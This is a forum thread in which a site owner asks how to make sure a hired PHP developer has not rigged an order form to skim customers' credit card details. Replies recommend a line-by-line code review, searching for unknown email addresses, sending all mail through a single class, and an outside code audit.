Results 1 to 10 of 10
  1. #1
    Join Date
    Jul 2004
    Posts
    329

    How can I guarantee a PHP Coder I hired didnt create a rigged order form?

    How can I guarantee that a PHP coder I hired didnt create a rigged order form that send him my customers C/C details as well.

    If the orderm form is rigged will the SSL notify me?

    Thanks

  2. #2
    Join Date
    Apr 2005
    Location
    Sweden
    Posts
    241
    No, it wont. The only way to make sure is to read though the source code and see for yourself, or have somebody you really trust do it for you.

  3. #3
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    If it is only a single file you can probably notice anything weird in the php code. To be sure you should find another coder that you really trust as posted above.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  4. #4
    Join Date
    Jul 2003
    Location
    Castle Pines, CO
    Posts
    7,189
    You should be able to also look thru the processing form as well to see if there is an email address in there that you do not recognize

  5. #5
    Join Date
    Jul 2004
    Posts
    329
    thanks for the tips

    has any one experienced what I am mentiong right here or I am a bit to worried?

  6. #6
    Join Date
    Jun 2003
    Location
    San Francisco
    Posts
    623
    You should set up a development policy that he should write a mail class (for example, CEmail), and all the mails should go through this class instead of calling the PHP mail function directly.

    Then, do a search on "mail" function and it should only happen in CEmail. For example, it is used in only one function, SendMail() function in CEmail.

    Once that's done, everything's easy. You can make that SendMail() to CC: to you, or to write a log.

  7. #7
    Join Date
    Apr 2005
    Location
    Sweden
    Posts
    241
    I really hope you're not going to email credit card details, even to yourself? That to me would be too reckless, since that type of communication is usually not protected good enough, and would give customers a false sense of security that their data is safe.

    Besides, there could be many other ways a coder could capture the data, like storing it in a file for later collection, sending it to another web server with a http request, etc.

    Anyways, like i said the only way to make sure is to read and understand the source code yourself, every single line, or have someone else do it for you..

  8. #8
    Join Date
    Jul 2001
    Location
    Canada
    Posts
    1,284
    As previous comment shave pointed to a solution I guess the question that pops into my mind is that if you don't trust the programmer, why did you hire them in the first place?
    "Obsolesence is just a lack of imagination."

  9. #9
    Join Date
    Mar 2004
    Posts
    1,301
    Originally posted by NyteOwl
    As previous comment shave pointed to a solution I guess the question that pops into my mind is that if you don't trust the programmer, why did you hire them in the first place?
    it's because there're many pretenders in this world. They sound very nice at first, but turn out to be ....who-khows-what - so, precaution is a good thing.

  10. #10
    Join Date
    May 2001
    Location
    Dayton, Ohio
    Posts
    4,962

    Re: How can I guarantee a PHP Coder I hired didnt create a rigged order form?

    Originally posted by joephill
    How can I guarantee that a PHP coder I hired didnt create a rigged order form that send him my customers C/C details as well.

    If the orderm form is rigged will the SSL notify me?

    Thanks

    You can normally contact another developer or development firm to audit the code. They could point out of the project has an call backs along with any other kind of exploits.

    -Mat
    -Mat Sumpter
    Director, Product Engagement
    Penton Media

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •